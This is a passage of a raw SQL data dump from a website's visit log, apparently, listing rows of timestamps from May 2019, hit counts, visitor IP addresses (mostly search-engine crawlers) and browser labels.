44227,1,1,0,0,'91.196.178.185','chrome'),(423556,1559044374,1,1,0,0,'178.154.171.24','other'),(423557,1559044803,1,1,0,0,'66.249.66.130','chrome'),(423558,1559044821,2,2,0,0,'66.249.66.222','chrome'),(423559,1559044876,2,2,0,0,'66.249.66.220','chrome'),(423560,1559044889,2,2,0,0,'66.249.66.218','chrome'),(423561,1559045147,1,1,0,0,'178.251.107.35','chrome'),(423562,1559045771,1,1,0,0,'66.249.66.130','chrome'),(423563,1559046085,1,1,0,0,'91.196.178.169','chrome'),(423564,1559046520,2,2,0,0,'66.249.66.218','chrome'),(423565,1559046556,1,1,0,0,'66.249.66.81','chrome'),(423566,1559046569,1,1,0,0,'66.249.66.220','chrome'),(423567,1559046621,1,1,0,0,'40.77.167.175','other'),(423568,1559046736,2,2,0,0,'207.46.13.101','other'),(423569,1559047523,3,3,0,0,'157.55.39.206','other'),(423570,1559047527,2,2,0,0,'157.55.39.190','other'),(423571,1559047610,1,1,0,0,'66.249.66.128','chrome'),(423572,1559047660,1,1,0,0,'40.77.167.175','other'),(423573,1559047689,2,2,0,0,'207.46.13.101','other'),(423574,1559048327,1,1,0,0,'213.180.203.9','other'),(423575,1559048515,1,1,0,0,'87.250.224.81','other'),(423576,1559048743,2,2,0,0,'66.249.66.222','chrome'),(423577,1559049922,1,1,0,0,'207.46.13.101','other'),(423578,1559050024,1,1,0,0,'134.249.146.125','chrome'),(423579,1559050381,1,1,0,0,'37.73.157.192','chrome'),(423580,1559050536,1,1,0,0,'66.249.66.134','chrome'),(423581,1559050665,1,1,0,0,'141.8.142.144','other'),(423582,1559051077,1,1,0,0,'66.249.66.218','chrome'),(423583,1559051380,1,1,0,0,'178.154.171.24','other'),(423584,1559051935,1,1,0,0,'66.249.66.196','chrome'),(423585,1559052099,2,2,0,0,'8.29.198.27','other'),(423586,1559052230,1,1,0,0,'66.249.66.193','chrome'),(423587,1559052282,1,1,0,0,'157.55.39.206','other'),(423588,1559052423,2,2,0,0,'157.55.39.190','other'),(423589,1559052470,1,1,0,0,'207.46.13.101','other'),(423590,1559052660,1,1,0,0,'66.249.66.138','chrome'),(423591,1559052989,1,1,0,0,'213.180.203.53','other'),(423592,1559053093,1,1,0,0,'5.45.207.19','other'),(423593,1559053177,1,1,0,0,'40.77.167.175','other'),(423594,1559053382,1,1,0,0,'207.46.13.101','other'),(423595,1559054150,1,1,0,0,'95.163.255.92','other'),(423596,1559054213,1,1,0,0,'66.249.66.196','chrome'),(423597,1559054433,1,1,0,0,'66.249.66.218','chrome'),(423598,1559054441,1,1,0,0,'66.249.66.220','chrome'),(423599,1559054639,1,1,0,0,'157.55.39.129','other'),(423600,1559054880,1,1,0,0,'37.53.90.175','chrome'),(423601,1559055350,1,1,0,0,'37.9.113.103','other'),(423602,1559055624,1,1,0,0,'178.154.200.48','other'),(423603,1559055857,1,1,0,0,'87.250.224.65','other'),(423604,1559055863,1,1,0,0,'178.154.244.49','other'),(423605,1559056199,1,1,0,0,'37.53.90.175','chrome'),(423606,1559056620,1,1,0,0,'66.249.66.220','chrome'),(423607,1559057248,1,1,0,0,'91.209.11.236','other'),(423608,1559057430,3,3,0,0,'5.45.207.19','other'),(423609,1559057537,1,1,0,0,'95.108.213.4','other'),(423610,1559057596,1,1,0,0,'66.249.66.220','chrome'),(423611,1559057873,2,2,0,0,'207.46.13.101','other'),(423612,1559058084,1,1,0,0,'66.249.66.128','chrome'),(423613,1559059005,1,1,0,0,'91.196.178.87','firefox'),(423614,1559059470,1,1,0,0,'141.8.142.103','other'),(423615,1559059497,1,1,0,0,'5.45.207.79','other'),(423616,1559060374,1,1,0,0,'207.46.13.82','other'),(423617,1559060461,1,1,0,0,'178.154.244.11','other'),(423618,1559061023,1,1,0,0,'91.209.11.236','other'),(423619,1559061616,1,1,0,0,'66.249.66.222','chrome'),(423620,1559061631,1,1,0,0,'66.249.66.220','chrome'),(423621,1559061792,1,1,0,0,'66.249.66.132','chrome'),(423622,1559062258,1,1,0,0,'37.9.113.148','other'),(423623,1559062928,1,1,0,0,'209.17.96.42','other'),(423624,1559062946,2,2,0,0,'8.29.198.26','other'),(423625,1559063026,2,2,0,0,'157.55.39.129','other'),(423626,1559063105,1,1,0,0,'91.209.11.236','other'),(423627,1559063212,1,1,0,0,'95.108.213.4','other'),(423628,1559063862,1,1,0,0,'66.249.66.193','chrome'),(423629,1559063925,3,3,0,0,'5.45.207.79','other'),(423630,1559063929,2,2,0,0,'5.45.207.19','other'),(423631,1559064069,1,1,0,0,'178.154.244.11','other'),(423632,1559064476,1,1,0,0,'157.55.39.216','other'),(423633,1559064635,1,1,0,0,'91.209.11.236','other'),(423634,1559065613,2,2,0,0,'91.209.11.236','other'),(423635,1559065956,1,1,0,0,'66.249.66.128','chrome'),(423636,1559066141,1,1,0,0,'213.180.203.9','other'),(423637,1559066155,1,1,0,0,'157.55.39.216','other'),(423638,1559066254,1,1,0,0,'66.249.66.222','chrome'),(423639,1559066749,1,1,0,0,'207.46.13.101','other'),(423640,1559067059,1,1,0,0,'66.249.69.62','chrome'),(423641,1559067288,1,1,0,0,'66.249.69.58','chrome'),(423642,1559068104,3,3,0,0,'207.46.13.101','other'),(423643,1559068497,2,2,0,0,'66.249.69.60','chrome'),(423644,1559068601,1,1,0,0,'141.8.142.144','other'),(423645,1559068618,1,1,0,0,'87.250.224.47','other'),(423646,1559068619,1,1,0,0,'91.209.11.236','other'),(423647,1559068668,1,1,0,0,'95.108.213.4','other'),(423648,1559068699,1,1,0,0,'213.180.203.17','other'),(423649,1559068737,1,1,0,0,'37.9.113.148','other'),(423650,1559068743,1,1,0,0,'5.45.207.8','other'),(423651,1559068773,1,1,0,0,'66.249.69.58','chrome'),(423652,1559069122,1,1,0,0,'91.196.178.181','chrome'),(423653,1559069638,108,108,0,0,'5.9.156.30','other'),(423654,1559069656,2,2,0,0,'91.209.11.236','other'),(423655,1559069786,1,1,0,0,'66.249.69.58','chrome'),(423656,1559070027,1,1,0,0,'37.115.205.71','chrome'),(423657,1559070082,1,1,0,0,'37.115.206.78','chrome'),(423658,1559070851,1,1,0,0,'91.209.11.236','other'),(423659,1559070875,1,1,0,0,'141.8.142.103','other'),(423660,1559070928,1,1,0,0,'178.154.200.48','other'),(423661,1559070932,1,1,0,0,'87.250.224.64','other'),(423662,1559070953,2,2,0,0,'5.45.207.19','other'),(423663,1559071137,1,1,0,0,'5.255.253.38','other'),(423664,1559071169,1,1,0,0,'37.9.113.148','other'),(423665,1559071444,1,1,0,0,'66.249.69.60','chrome'),(423666,1559071521,1,1,0,0,'37.115.205.71','chrome'),(423667,1559071720,1,1,0,0,'37.115.206.78','chrome'),(423668,1559072468,1,1,0,0,'91.209.11.236','other'),(423669,1559072731,1,1,0,0,'207.46.13.34','other'),(423670,1559073110,1,1,0,0,'141.8.142.81','other'),(423671,1559073113,1,1,0,0,'178.154.171.24','other'),(423672,1559073212,1,1,0,0,'37.9.113.148','other'),(423673,1559073223,1,1,0,0,'213.180.203.17','other'),(423674,1559073227,1,1,0,0,'87.250.224.118','other'),(423675,1559073290,1,1,0,0,'178.154.200.48','other'),(423676,1559073466,1,1,0,0,'87.250.224.47','other'),(423677,1559073471,1,1,0,0,'66.249.75.99','chrome'),(423678,1559073556,1,1,0,0,'40.77.167.107','other'),(423679,1559073598,1,1,0,0,'95.108.213.4','other'),(423680,1559073758,1,1,0,0,'66.249.69.60','chrome'),(423681,1559073810,2,2,0,0,'8.29.198.27','other'),(423682,1559074896,1,1,0,0,'91.209.11.236','other'),(423683,1559075406,1,1,0,0,'178.255.215.94','other'),(423684,1559075413,1,1,0,0,'87.250.224.47','other'),(423685,1559075454,1,1,0,0,'109.251.199.39','chrome'),(423686,1559075547,2,2,0,0,'66.249.69.58','chrome'),(423687,1559075630,2,2,0,0,'66.249.69.62','chrome'),(423688,1559075649,160,160,0,0,'173.208.130.202','other'),(423689,1559075794,119,119,0,0,'5.9.112.210','other'),(423690,1559076536,2,2,0,0,'87.250.224.47','other'),(423691,1559076550,37,37,0,0,'173.208.130.202','other'),(423692,1559076969,1,1,0,0,'5.45.207.79','other'),(423693,1559077278,1,1,0,0,'91.209.11.236','other'),(423694,1559077415,1,1,0,0,'40.77.167.142','other'),(423695,1559077477,1,1,0,0,'66.249.69.58','chrome'),(423696,1559078192,1,1,0,0,'37.9.113.20','other'),(423697,1559078383,1,1,0,0,'5.45.207.19','other'),(423698,1559078509,1,1,0,0,'13.66.139.0','other'),(423699,1559079965,1,1,0,0,'66.249.69.62','chrome'),(423700,1559080054,1,1,0,0,'66.249.69.60','chrome'),(423701,1559080303,1,1,0,0,'178.154.244.11','other'),(423702,1559080453,1,1,0,0,'5.45.207.19','other'),(423703,1559080457,1,1,0,0,'95.108.213.4','other'),(423704,1559081147,1,1,0,0,'91.209.11.236','other'),(423705,1559081946,2,2,0,0,'66.249.69.33','chrome'),(423706,1559082168,1,1,0,0,'66.249.69.60','chrome'),(423707,1559082346,1,1,0,0,'40.77.167.142','other'),(423708,1559082511,1,1,0,0,'91.209.11.236','other'),(423709,1559082702,6,6,0,0,'159.65.24.22','chrome'),(423710,1559082924,1,1,0,0,'212.180.208.122','chrome'),(423711,1559082926,1,1,0,0,'213.180.203.17','other'),(423712,1559082951,2,2,0,0,'5.45.207.19','other'),(423713,1559083011,1,1,0,0,'141.8.132.16','other'),(423714,1559083014,1,1,0,0,'95.108.181.94','other'),(423715,1559083678,1,1,0,0,'66.249.69.58','chrome'),(423716,1559083687,1,1,0,0,'66.249.75.136','chrome'),(423717,1559084682,1,1,0,0,'8.29.198.27','other'),(423718,1559084803,2,2,0,0,'66.249.69.60','chrome'),(423719,1559084912,1,1,0,0,'8.29.198.25','other'),(423720,1559085623,1,1,0,0,'178.154.171.17','other'),(423721,1559085628,1,1,0,0,'141.8.142.191','other'),(423722,1559085789,1,1,0,0,'5.45.207.79','other'),(423723,1559085889,1,1,0,0,'95.108.213.4','other'),(423724,1559086327,1,1,0,0,'207.46.13.34','other'),(423725,1559086376,1,1,0,0,'66.249.69.60','chrome'),(423726,1559086844,1,1,0,0,'91.209.11.236','other'),(423727,1559086987,1,1,0,0,'5.255.253.38','other'),(423728,1559087016,1,1,0,0,'66.249.69.62','chrome'),(423729,1559087110,2,2,0,0,'66.249.69.58','chrome'),(423730,1559087370,1,1,0,0,'40.77.167.69','other'),(423731,1559087808,1,1,0,0,'207.46.13.34','other'),(423732,1559088076,1,1,0,0,'66.249.69.60','chrome'),(423733,1559088306,1,1,0,0,'178.154.244.65','other'),(423734,1559088342,1,1,0,0,'87.250.224.118','other'),(423735,1559088453,1,1,0,0,'141.8.183.11','other'),(423736,1559088481,1,1,0,0,'87.250.224.65','other'),(423737,1559088527,1,1,0,0,'66.249.69.58','chrome'),(423738,1559088664,1,1,0,0,'66.249.75.134','chrome'),(423739,1559088994,1,1,0,0,'95.163.255.99','other'),(423740,1559089276,1,1,0,0,'40.77.167.69','other'),(423741,1559089962,1,1,0,0,'207.46.13.34','other'),(423742,1559090125,1,1,0,0,'66.249.69.60','chrome'),(423743,1559091341,1,1,0,0,'37.9.113.103','other'),(423744,1559091414,1,1,0,0,'141.8.132.16','other'),(423745,1559091432,1,1,0,0,'87.250.224.65','other'),(423746,1559092141,1,1,0,0,'66.249.69.62','chrome'),(423747,1559092484,1,1,0,0,'5.255.253.38','other'),(423748,1559092969,1,1,0,0,'66.249.75.134','chrome'),(423749,1559093834,1,1,0,0,'87.250.224.64','other'),(423750,1559093966,1,1,0,0,'141.8.142.108','other'),(423751,1559094068,1,1,0,0,'178.154.171.27','other'),(423752,1559094150,1,1,0,0,'87.250.224.118','other'),(423753,1559094294,1,1,0,0,'40.77.167.69','other'),(423754,1559094692,1,1,0,0,'95.163.255.97','other'),(423755,1559095029,1,1,0,0,'5.45.207.79','other'),(423756,1559095053,2,2,0,0,'66.249.69.60','chrome'),(423757,1559095505,2,2,0,0,'91.209.11.236','other'),(423758,1559095524,2,2,0,0,'8.29.198.27','other'),(423759,1559095723,1,1,0,0,'141.8.142.144','other'),(423760,1559096813,1,1,0,0,'91.209.11.236','other'),(423761,1559096951,1,1,0,0,'95.108.213.50','other'),(423762,1559096994,1,1,0,0,'178.154.244.11','other'),(423763,1559097000,2,2,0,0,'37.9.113.148','other'),(423764,1559097217,1,1,0,0,'37.9.113.103','other'),(423765,1559097236,1,1,0,0,'87.250.224.118','other'),(423766,1559097239,1,1,0,0,'95.108.181.75','other'),(423767,1559097262,1,1,0,0,'66.249.69.58','chrome'),(423768,1559097309,1,1,0,0,'66.249.69.62','chrome'),(423769,1559097382,1,1,0,0,'66.249.75.134','chrome'),(423770,1559098235,1,1,0,0,'66.249.69.62','chrome'),(423771,1559098298,1,1,0,0,'13.66.139.0','other'),(423772,1559098442,1,1,0,0,'157.55.39.77','other'),(423773,1559099362,1,1,0,0,'66.249.69.58','chrome'),(423774,1559100154,1,1,0,0,'141.8.142.108','other'),(423775,1559100200,1,1,0,0,'141.8.142.144','other'),(423776,1559100220,1,1,0,0,'87.250.224.47','other'),(423777,1559100231,1,1,0,0,'87.250.224.64','other'),(423778,1559100240,1,1,0,0,'141.8.142.81','other'),(423779,1559100257,1,1,0,0,'178.154.200.48','other'),(423780,1559100384,1,1,0,0,'5.255.253.16','other'),(423781,1559100409,1,1,0,0,'141.8.132.16','other'),(423782,1559100412,1,1,0,0,'93.158.166.7','other'),(423783,1559100479,1,1,0,0,'95.108.213.4','other'),(423784,1559100558,1,1,0,0,'17.58.98.62','other'),(423785,1559101310,1,1,0,0,'180.76.15.28','other'),(423786,1559102120,1,1,0,0,'178.154.244.21','other'),(423787,1559102649,1,1,0,0,'66.249.69.62','chrome'),(423788,1559103132,1,1,0,0,'66.249.69.60','chrome'),(423789,1559103153,1,1,0,0,'91.196.178.129','firefox'),(423790,1559103550,1,1,0,0,'87.250.224.47','other'),(423791,1559103562,1,1,0,0,'95.108.213.4','other'),(423792,1559103580,1,1,0,0,'5.255.253.16','other'),(423793,1559103592,1,1,0,0,'95.108.181.75','other'),(423794,1559103709,1,1,0,0,'141.8.132.16','other'),(423795,1559104258,1,1,0,0,'46.166.137.216','other'),(423796,1559105158,1,1,0,0,'207.46.13.216','other'),(423797,1559106137,1,1,0,0,'207.46.13.167','other'),(423798,1559106392,2,2,0,0,'8.29.198.26','other'),(423799,1559106906,1,1,0,0,'207.46.13.216','other'),(423800,1559107077,1,1,0,0,'66.249.75.136','chrome'),(423801,1559107108,1,1,0,0,'66.249.69.60','chrome'),(423802,1559107150,2,2,0,0,'95.108.213.4','other'),(423803,1559107152,1,1,0,0,'66.249.69.62','chrome'),(423804,1559107166,1,1,0,0,'5.45.207.79','other'),(423805,1559107809,1,1,0,0,'109.70.100.26','other'),(423806,1559108863,1,1,0,0,'66.249.69.58','chrome'),(423807,1559108866,1,1,0,0,'195.138.169.160','chrome'),(423808,1559108932,1,1,0,0,'207.46.13.216','other'),(423809,1559109289,1,1,0,0,'207.46.13.167','other'),(423810,1559109537,1,1,0,0,'91.230.25.118','chrome'),(423811,1559109820,1,1,0,0,'66.249.69.62','chrome'),(423812,1559110224,1,1,0,0,'78.154.165.144','chrome'),(423813,1559110572,3,3,0,0,'95.108.213.4','other'),(423814,1559110603,4,4,0,0,'5.45.207.19','other'),(423815,1559110634,1,1,0,0,'5.45.207.79','other'),(423816,1559110704,1,1,0,0,'91.196.178.184','chrome'),(423817,1559110808,1,1,0,0,'141.8.142.103','other'),(423818,1559110836,2,2,0,0,'178.154.244.11','other'),(423819,1559111021,1,1,0,0,'207.46.13.216','other'),(423820,1559111488,1,1,0,0,'66.249.69.62','chrome'),(423821,1559111937,1,1,0,0,'66.249.69.60','chrome'),(423822,1559112072,1,1,0,0,'207.46.13.66','other'),(423823,1559112480,1,1,0,0,'180.76.15.152','other'),(423824,1559112978,2,2,0,0,'66.249.69.58','chrome'),(423825,1559113574,1,1,0,0,'66.249.69.62','chrome'),(423826,1559114005,1,1,0,0,'194.37.248.11','chrome'),(423827,1559114133,1,1,0,0,'37.9.113.148','other'),(423828,1559114188,1,1,0,0,'87.250.224.47','other'),(423829,1559114195,1,1,0,0,'207.46.13.216','other'),(423830,1559114216,2,2,0,0,'66.249.69.60','chrome'),(423831,1559114317,1,1,0,0,'213.180.203.9','other'),(423832,1559114425,1,1,0,0,'178.154.244.11','other'),(423833,1559114458,1,1,0,0,'5.45.207.19','other'),(423834,1559114651,1,1,0,0,'207.46.13.106','other'),(423835,1559114658,1,1,0,0,'66.249.69.62','chrome'),(423836,1559115751,2,2,0,0,'157.55.39.250','other'),(423837,1559116194,1,1,0,0,'78.154.165.144','chrome'),(423838,1559116413,3,3,0,0,'157.55.39.219','other'),(423839,1559117234,2,2,0,0,'207.46.13.106','other'),(423840,1559117255,1,1,0,0,'8.29.198.25','other'),(423841,1559117466,1,1,0,0,'8.29.198.26','other'),(423842,1559117726,1,1,0,0,'91.196.178.102','chrome'),(423843,1559117886,1,1,0,0,'141.8.142.191','other'),(423844,1559117967,1,1,0,0,'178.154.171.30','other'),(423845,1559117991,1,1,0,0,'95.108.181.54','other'),(423846,1559118001,1,1,0,0,'37.9.113.20','other'),(423847,1559118040,2,2,0,0,'87.250.224.47','other'),(423848,1559118048,1,1,0,0,'95.163.255.98','other'),(423849,1559118049,1,1,0,0,'178.154.171.24','other'),(423850,1559118152,2,2,0,0,'141.8.142.103','other'),(423851,1559118195,1,1,0,0,'95.108.213.4','other'),(423852,1559118215,1,1,0,0,'78.154.165.144','chrome'),(423853,1559118297,2,2,0,0,'207.46.13.66','other'),(423854,1559118387,1,1,0,0,'5.45.207.79','other'),(423855,1559119128,1,1,0,0,'91.196.178.85','chrome'),(423856,1559119693,1,1,0,0,'207.46.13.106','other'),(423857,1559121692,3,3,0,0,'66.249.69.60','chrome'),(423858,1559121979,1,1,0,0,'66.249.69.62','chrome'),(423859,1559122016,1,1,0,0,'178.154.244.11','other'),(423860,1559122107,1,1,0,0,'178.154.244.21','other'),(423861,1559122144,1,1,0,0,'141.8.142.108','other'),(423862,1559122250,2,2,0,0,'5.255.253.38','other'),(423863,1559122324,1,1,0,0,'87.250.224.99','other'),(423864,1559122455,1,1,0,0,'66.249.75.134','chrome'),(423865,1559122805,2,2,0,0,'40.77.167.133','other'),(423866,1559122853,1,1,0,0,'46.201.9.133','chrome'),(423867,1559123555,2,2,0,0,'195.10.210.70','chrome'),(423868,1559124260,10,10,0,0,'176.99.12.243','chrome'),(423869,1559125037,1,1,0,0,'109.74.154.72','chrome'),(423870,1559125687,1,1,0,0,'66.249.75.136','chrome'),(423871,1559125733,1,1,0,0,'37.9.113.20','other'),(423872,1559125938,1,1,0,0,'5.45.207.19','other'),(423873,1559126066,1,1,0,0,'78.154.165.144','chrome'),(423874,1559126182,2,2,0,0,'95.213.141.126','opera'),(423875,1559126780,1,1,0,0,'66.249.69.58','chrome'),(423876,1559127684,3,3,0,0,'35.225.224.3','chrome'),(423877,1559127731,3,3,0,0,'35.226.55.36','chrome'),(423878,1559127747,3,3,0,0,'35.202.152.242','chrome'),(423879,1559127782,3,3,0,0,'35.232.152.69','chrome'),(423880,1559127796,2,2,0,0,'35.224.224.193','chrome'),(423882,1559127808,3,3,0,0,'35.224.170.103','chrome'),(423883,1559128105,1,1,0,0,'8.29.198.26','other'),(423884,1559128275,2,2,0,0,'66.249.69.62','chrome'),(423885,1559128325,1,1,0,0,'8.29.198.25','other'),(423886,1559128355,2,2,0,0,'66.249.75.132','chrome'),(423887,1559128716,1,1,0,0,'94.100.221.234','chrome'),(423888,1559128756,1,1,0,0,'157.55.39.222','other'),(423889,1559129080,1,1,0,0,'87.250.224.81','other'),(423890,1559129101,1,1,0,0,'37.9.113.148','other'),(423891,1559129191,1,1,0,0,'95.108.213.4','other'),(423892,1559129224,3,3,0,0,'5.45.207.19','other'),(423893,1559129319,1,1,0,0,'5.45.207.79','other'),(423894,1559129359,1,1,0,0,'87.250.224.65','other'),(423895,1559129398,1,1,0,0,'87.250.224.47','other'),(423896,1559130164,2,2,0,0,'66.249.69.58','chrome'),(423897,1559130609,1,1,0,0,'77.222.134.102','other'),(423898,1559130985,1,1,0,0,'207.46.13.77','other'),(423899,1559131482,1,1,0,0,'66.249.75.136','chrome'),(423900,1559131871,1,1,0,0,'91.195.156.90','chrome'),(423901,1559132242,2,2,0,0,'141.8.142.103','other'),(423902,1559132285,3,3,0,0,'5.45.207.79','other'),(423903,1559132422,1,1,0,0,'91.196.178.85','chrome'),(423904,1559132575,1,1,0,0,'178.154.244.11','other'),(423905,1559132735,1,1,0,0,'5.45.207.8','other'),(423906,1559133120,1,1,0,0,'178.255.215.94','other'),(423907,1559133489,1,1,0,0,'91.124.235.105','chrome'),(423908,1559133802,1,1,0,0,'46.211.217.189','chrome'),(423909,1559134102,1,1,0,0,'66.249.69.58','chrome'),(423910,1559134205,2,2,0,0,'207.46.13.77','other'),(423911,1559134307,3,3,0,0,'207.46.13.104','other'),(423912,1559134417,1,1,0,0,'5.45.207.19','other'),(423913,1559134462,1,1,0,0,'40.77.167.22','other'),(423914,1559135256,1,1,0,0,'87.250.224.107','other'),(423915,1559135476,1,1,0,0,'95.108.213.4','other'),(423916,1559135524,1,1,0,0,'5.45.207.19','other'),(423917,1559135559,1,1,0,0,'5.45.207.79','other'),(423918,1559135930,1,1,0,0,'66.249.75.136','chrome'),(423919,1559136008,2,2,0,0,'91.196.178.132','chrome'),(423920,1559136637,1,1,0,0,'66.249.69.60','chrome'),(423921,1559136935,1,1,0,0,'207.46.13.77','other'),(423922,1559137468,1,1,0,0,'46.211.26.168','chrome'),(423923,1559137877,1,1,0,0,'180.76.15.7','other'),(423924,1559137880,2,2,0,0,'178.154.244.11','other'),(423925,1559137884,2,2,0,0,'5.45.207.19','other'),(423926,1559138307,1,1,0,0,'66.249.69.60','chrome'),(423927,1559138656,1,1,0,0,'91.209.11.236','other'),(423928,1559138999,2,2,0,0,'8.29.198.26','other'),(423929,1559139185,2,2,0,0,'5.45.207.19','other'),(423930,1559139495,1,1,0,0,'66.249.69.62','chrome'),(423931,1559140373,3,3,0,0,'5.45.207.79','other'),(423932,1559140708,2,2,0,0,'5.45.207.19','other'),(423933,1559140901,1,1,0,0,'66.249.69.60','chrome'),(423934,1559140940,2,2,0,0,'40.77.167.179','other'),(423935,1559141099,1,1,0,0,'87.250.224.65','other'),(423936,1559141101,1,1,0,0,'87.250.224.47','other'),(423937,1559141141,1,1,0,0,'66.249.69.62','chrome'),(423938,1559141185,1,1,0,0,'95.108.213.4','other'),(423939,1559141481,1,1,0,0,'157.55.39.29','other'),(423940,1559141852,1,1,0,0,'91.196.178.102','chrome'),(423941,1559141912,1,1,0,0,'46.211.96.86','chrome'),(423942,1559141982,1,1,0,0,'46.211.1.24','chrome'),(423943,1559141984,1,1,0,0,'91.196.178.83','firefox'),(423944,1559143095,1,1,0,0,'95.108.213.4','other'),(423945,1559144244,1,1,0,0,'40.77.167.179','other'),(423946,1559144265,1,1,0,0,'207.46.13.77','other'),(423947,1559144872,1,1,0,0,'157.55.39.29','other'),(423948,1559145831,1,1,0,0,'87.250.224.47','other'),(423949,1559145841,1,1,0,0,'5.45.207.19','other'),(423950,1559145855,1,1,0,0,'178.154.244.11','other'),(423951,1559145867,3,3,0,0,'5.45.207.79','other'),(423952,1559146030,1,1,0,0,'40.77.167.179','other'),(423953,1559146131,1,1,0,0,'157.55.39.29','other'),(423954,1559146461,1,1,0,0,'207.46.13.82','other'),(423955,1559147925,1,1,0,0,'207.46.13.82','other'),(423956,1559148438,1,1,0,0,'141.8.183.23','other'),(423957,1559148505,1,1,0,0,'5.255.253.16','other'),(423958,1559148536,1,1,0,0,'141.8.142.191','other'),(423959,1559148573,1,1,0,0,'178.154.171.17','other'),(423960,1559149378,1,1,0,0,'178.154.244.11','other'),(423961,1559149697,2,2,0,0,'66.249.69.60','chrome'),(423962,1559149853,1,1,0,0,'8.29.198.25','other'),(423963,1559150010,1,1,0,0,'178.255.215.94','other'),(423964,1559150022,1,1,0,0,'207.46.13.58','other'),(423965,1559150026,1,1,0,0,'66.249.75.132','chrome'),(423966,1559150043,1,1,0,0,'207.46.13.82','other'),(423967,1559150072,1,1,0,0,'8.29.198.26','other'),(423968,1559151009,1,1,0,0,'95.108.213.4','other'),(423969,1559151042,1,1,0,0,'5.45.207.8','other'),(423970,1559151053,1,1,0,0,'5.255.253.25','other'),(423971,1559151056,1,1,0,0,'141.8.132.16','other'),(423972,1559151067,1,1,0,0,'5.45.207.79','other'),(423973,1559151138,1,1,0,0,'178.154.244.11','other'),(423974,1559151141,1,1,0,0,'178.154.244.49','other'),(423975,1559151197,1,1,0,0,'37.9.113.148','other'),(423976,1559151300,1,1,0,0,'87.250.224.99','other'),(423977,1559152536,2,2,0,0,'66.249.69.58','chrome'),(423978,1559153074,2,2,0,0,'66.249.69.62','chrome'),(423979,1559153279,1,1,0,0,'5.9.98.178','other'),(423980,1559153399,1,1,0,0,'95.132.4.137','other'),(423981,1559153519,1,1,0,0,'157.55.39.29','other'),(423982,1559153667,1,1,0,0,'141.8.142.108','other'),(423983,1559153807,1,1,0,0,'87.250.224.99','other'),(423984,1559153843,1,1,0,0,'5.255.253.25','other'),(423985,1559153870,1,1,0,0,'87.250.224.47','other'),(423986,1559153945,2,2,0,0,'207.46.13.122','other'),(423987,1559153953,1,1,0,0,'66.249.75.132','chrome'),(423988,1559153959,1,1,0,0,'5.45.207.79','other'),(423989,1559154181,1,1,0,0,'5.9.98.178','other'),(423990,1559154637,2,2,0,0,'157.55.39.56','other'),(423991,1559155086,1,1,0,0,'5.9.98.178','other'),(423992,1559155286,1,1,0,0,'207.46.13.82','other'),(423993,1559155994,1,1,0,0,'5.9.98.178','other'),(423994,1559156102,1,1,0,0,'13.66.139.0','other'),(423995,1559156209,1,1,0,0,'207.46.13.179','other'),(423996,1559156285,1,1,0,0,'66.249.65.214','chrome'),(423997,1559156417,1,1,0,0,'39.99.32.120','other'),(423998,1559156603,1,1,0,0,'5.45.207.19','other'),(423999,1559156624,1,1,0,0,'46.211.73.0','chrome'),(424000,1559156627,1,1,0,0,'207.46.13.82','other'),(424001,1559156652,1,1,0,0,'5.45.207.79','other'),(424002,1559156895,1,1,0,0,'5.9.98.178','other'),(424003,1559157796,1,1,0,0,'5.9.98.178','other'),(424004,1559158306,1,1,0,0,'66.249.65.214','chrome'),(424005,1559158354,1,1,0,0,'66.249.73.7','chrome'),(424006,1559158629,1,1,0,0,'66.249.65.212','chrome'),(424007,1559158711,1,1,0,0,'91.196.178.131','firefox'),(424008,1559159121,1,1,0,0,'66.249.73.5','chrome'),(424009,1559159281,1,1,0,0,'5.45.207.19','other'),(424010,1559159291,1,1,0,0,'178.154.171.17','other'),(424011,1559159323,1,1,0,0,'95.108.213.4','other'),(424012,1559159505,1,1,0,0,'5.255.253.16','other'),(424013,1559159951,1,1,0,0,'5.188.45.160','chrome'),(424014,1559160145,1,1,0,0,'95.152.6.96','chrome'),(424015,1559160200,1,1,0,0,'157.55.39.29','other'),(424016,1559160552,1,1,0,0,'66.249.65.212','chrome'),(424017,1559160712,1,1,0,0,'8.29.198.26','other'),(424018,1559160933,1,1,0,0,'8.29.198.25','other'),(424019,1559161800,1,1,0,0,'157.55.39.29','other'),(424020,1559161958,2,2,0,0,'141.8.142.144','other'),(424021,1559162146,1,1,0,0,'178.154.171.69','other'),(424022,1559162192,1,1,0,0,'37.9.113.148','other'),(424023,1559162224,1,1,0,0,'178.154.171.27','other'),(424024,1559164088,1,1,0,0,'207.46.13.82','other'),(424025,1559164837,1,1,0,0,'213.180.203.17','other'),(424026,1559165437,1,1,0,0,'40.77.167.156','other'),(424027,1559165807,1,1,0,0,'141.8.142.191','other'),(424028,1559165821,1,1,0,0,'87.250.224.99','other'),(424029,1559166842,2,2,0,0,'40.77.167.156','other'),(424030,1559167473,1,1,0,0,'66.249.73.5','chrome'),(424031,1559168011,1,1,0,0,'40.77.167.18','other'),(424032,1559168128,1,1,0,0,'40.77.167.159','other'),(424033,1559168641,1,1,0,0,'207.46.13.82','other'),(424034,1559168669,1,1,0,0,'5.255.253.38','other'),(424035,1559168711,1,1,0,0,'213.180.203.17','other'),(424036,1559168715,1,1,0,0,'141.8.183.23','other'),(424037,1559168739,1,1,0,0,'37.9.113.148','other'),(424038,1559168842,1,1,0,0,'141.8.142.108','other'),(424039,1559168845,1,1,0,0,'178.154.171.27','other'),(424040,1559168848,1,1,0,0,'87.250.224.81','other'),(424041,1559168992,1,1,0,0,'5.45.207.76','other'),(424042,1559169111,1,1,0,0,'13.66.139.0','other'),(424043,1559171248,1,1,0,0,'178.154.200.8','other'),(424044,1559171259,1,1,0,0,'5.45.207.8','other'),(424045,1559171271,1,1,0,0,'95.108.213.50','other'),(424046,1559171325,1,1,0,0,'141.8.183.11','other'),(424047,1559171336,1,1,0,0,'95.108.213.4','other'),(424048,1559171409,1,1,0,0,'5.45.207.19','other'),(424049,1559171563,1,1,0,0,'8.29.198.26','other'),(424050,1559171798,1,1,0,0,'8.29.198.25','other'),(424051,1559172267,1,1,0,0,'51.254.97.56','firefox'),(424052,1559173059,1,1,0,0,'40.77.167.159','other'),(424053,1559173758,1,1,0,0,'141.8.142.108','other'),(424054,1559173859,1,1,0,0,'178.154.171.17','other'),(424055,1559173913,1,1,0,0,'178.154.171.30','other'),(424056,1559173923,1,1,0,0,'40.77.167.156','other'),(424057,1559173931,1,1,0,0,'141.8.183.11','other'),(424058,1559174062,1,1,0,0,'141.8.142.144','other'),(424059,1559174064,1,1,0,0,'95.108.181.94','other'),(424060,1559174178,1,1,0,0,'66.249.65.214','chrome'),(424061,1559175337,1,1,0,0,'40.77.167.159','other'),(424062,1559175405,1,1,0,0,'95.108